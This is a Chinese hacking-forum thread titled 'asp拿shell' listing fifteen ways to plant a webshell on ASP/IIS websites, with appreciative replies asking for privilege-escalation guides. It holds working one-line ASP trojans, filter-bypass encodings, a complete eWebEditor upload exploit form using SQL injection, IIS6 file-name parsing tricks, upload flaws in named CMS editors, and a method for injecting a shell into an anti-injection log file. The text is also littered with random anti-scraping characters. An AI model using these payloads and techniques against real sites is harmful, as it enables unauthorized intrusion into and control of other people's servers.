返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式6 Q. z' B- H# [# ~! w
& l* R7 b$ x7 _1 [2 o0 X- @
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp; m/ w' l2 u0 t8 h
9 k$ D. W/ L; W2 S: k
3.上传漏洞:: I! Y0 t% T6 {4 X& |* v( t

7 E" j7 o9 K' U0 m; z1 q3 u6 ^动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
( ^  d' y' m* a, z8 A7 U8 n. {( A& z" r6 ?6 Q* V) T
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件- A. B) t5 C& e, R( z/ G
( o* M4 O( j0 a/ m9 ?
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp. m0 f( i- S1 C: O' o  {
然后在上传文件里面填要传的图片格式的ASP木马
7 z& L7 e7 z  e7 p就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
$ O0 P$ D1 m) H5 d1 }- W9 r# [4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传3 O* V  z7 v' X3 L0 L0 _# n
9 l" z$ r5 ^  u+ t2 ?
<html>! e+ v% ]! C  k* P; G3 }4 G8 e
<head>
$ Q8 d- n/ M1 r: p9 Y<title>ewebeditor upload.asp上传利用</title>
# w: A' {0 p: X& E# U# U</head>2 z, W) d; E2 c* K2 q
<body>( K& E, ^" k' o$ r) j
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">9 R1 q0 q) X5 j# J
<input type=file name=uploadfile size=100><br><br>5 p5 @8 C- F3 t4 F9 `
<input type=submit value=Fuck>+ _3 D0 o% ?$ o. Z* j
</form>4 W: {: V2 x) K( v
</body>% g! }  E% F+ y) v
</form>
+ R% a: g8 b+ _: a: v4 \0 `4 k</html>5 ~6 X8 [6 Q  W, L/ v8 j
; G- X! d# n0 ^, `* {& z* n' {! u- ]
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问4 D" ?% M  t- C$ ^. H% u& I( Y
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp6 _! B5 j# W/ {" L2 r, f

& _! l4 O5 p3 D1 `1 }; ^) V3 ?利用windows2003解析。建立zjq.asp的文件夹
* A1 [9 X/ M2 |8 H/ R2 x* P7 H% p+ F9 X% y
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型+ S2 l, I* O- e- z. K( Y& `; f5 O
3 f0 k. P3 v* ]) W( ~- O
7.cuteeditor:类似ewebeditor0 m) q+ \. m( N& y$ @7 C
1 z* W1 n6 l* M( M2 q: |
8.htmleditor:同上
' ]+ W. Z1 `6 E( L* ?/ g) x
3 ^8 S0 B" A6 d  |" M9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
5 G6 A, W; P% E; k
$ l5 Y7 F: V& w- h6 h( o<%execute request("value")%><%'<% loop <%:%>! s7 s: u. \1 j9 h7 g- {

* E( w5 e5 ?8 Z; f0 U<%'<% loop <%:%><%execute request("value")%>
4 n7 M& w; M) I  U6 D
+ {5 u% e" A6 N* G" v<%execute request("value")'<% loop <%:%>
) p# c$ y: b! R7 A( `" J9 X9 f4 {9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞# ^* W1 V  s" d" k% G# ?# W4 J
2 W4 c; l1 N# j/ e+ Z  ]- [( H
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞7 q1 L$ B1 ]: ^, `, R
8 G0 l2 O4 H# i8 H: A6 N/ {2 G
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3+ Q, l2 i9 R3 n& {: L  {" K

2 ~9 `8 r, _0 _! T) w解析漏洞得到webshell
% _- a. R4 L1 m: b! Q, z
! d. K. ?, L6 I: O( e9 ]' _$ V' L12.mssql差异备份,日志备份,前提需知道web路径$ b2 T% f. q. [3 U2 n
2 _" h3 L; U0 U! b  G
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
8 u) R& ~. W; F/ q! M' e! b1 Y+ {  y8 g
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell! Y- G1 @6 |2 k- Z

! t) |3 [/ `) T2 i/ W8 n15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可, L& _9 Q# N! w6 c. C+ ]

; _  S% G" C/ B+ H9 M5 t2 j5 _* E8 a以上只是本人的一些拙见,并不完善,以后想到了再继续添加& J2 e; G3 x+ y
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
' ^; H' Q5 y1 v( M" E0 z* P7 F9 w. D, L  h, b2 F' u
+ O; J. N1 ^' d
很好啊、基本的入侵方法都包含了8 F  p3 b& Z. e& E1 e6 |
5 n& ^" P/ V" q- K$ [5 `- s" j
最好来个提权的帖子再。! M+ i1 Z" [4 c7 W- U
$ C% ^& e6 n+ O/ {
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表